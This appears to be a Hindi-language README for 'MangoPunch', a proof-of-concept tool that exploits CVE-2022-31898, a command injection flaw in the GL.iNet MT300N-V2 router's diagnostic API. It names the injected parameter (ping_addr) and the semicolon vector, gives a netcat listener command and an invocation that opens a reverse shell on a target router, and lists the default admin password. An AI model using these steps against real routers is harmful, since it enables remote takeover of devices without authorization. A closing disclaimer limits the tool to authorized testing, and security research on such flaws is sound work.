
प्रमाणित कमांड इंजेक्शन उपकरण (CVE-2022-31898) - HACKCONRD 2026।
__ __ _____ _
| \/ | | __ \ | |
| \ / | __ _ _ __ __ _ ___ | |__) | _ _ __ ___| |__
| |\/| |/ _` | '_ \ / _` |/ _ \| ___/ | | | '_ \ / __| '_ \
| | | | (_| | | | | (_| | (_) | | | |_| | | | | (__| | | |
|_| |_|\__,_|_| |_|\__, |\___/|_| \__,_|_| |_|\___|_| |_|
__/ |
|___/
इस रिपॉजिटरी में GL.iNet MT300N-V2 (मैंगो) और अन्य मॉडलों में 3.215 से नीचे के फर्मवेयर संस्करणों में पाई गई रिमोट कमांड एग्जीक्यूशन (RCE) कमजोरी के लिए एक तकनीकी प्रूफ ऑफ कॉन्सेप्ट (PoC) शामिल है।
यह दोष डायग्नोस्टिक API के ping_addr पैरामीटर में मौजूद है, जो एक प्रमाणित हमलावर को शेल मेटाकैरेक्टर (;) के माध्यम से मनमाने सिस्टम कमांड निष्पादित करने की अनुमति देता है।
अपने हमलावर मशीन (Kali Linux) में एक टर्मिनल खोलें और Netcat लिसनर शुरू करें:
nc -lvnp 9292
रिवर्स शेल को ट्रिगर करने के लिए निम्नलिखित कमांड का उपयोग करें:
python3 mangopunch.py -R <TARGET_IP> -L <YOUR_IP> -l <YOUR_LISTERNER_PORT> -p <PASSWORD>
| झंडा | पूरा नाम | विवरण | डिफ़ॉल्ट |
|---|---|---|---|
-R | --rhost | रिमोट लक्ष्य IP (राउटर) | आवश्यक |
-P | --rport | वेब प्रबंधन पोर्ट | 443 |
-L | --lhost | लिसनर IP (काली/हमलावर) | आवश्यक |
-l | --lport | लिसनर पोर्ट | आवश्यक |
-p | --pwd | एडमिन पासवर्ड | goodlife |
-t | --https | HTTPS सक्षम करें | False |
अस्वीकरण: यह उपकरण केवल शैक्षिक और अधिकृत सुरक्षा परीक्षण उद्देश्यों के लिए है। लेखक किसी भी दुरुपयोग के लिए जिम्मेदार नहीं है। MangoPunch: CVE-2022-31898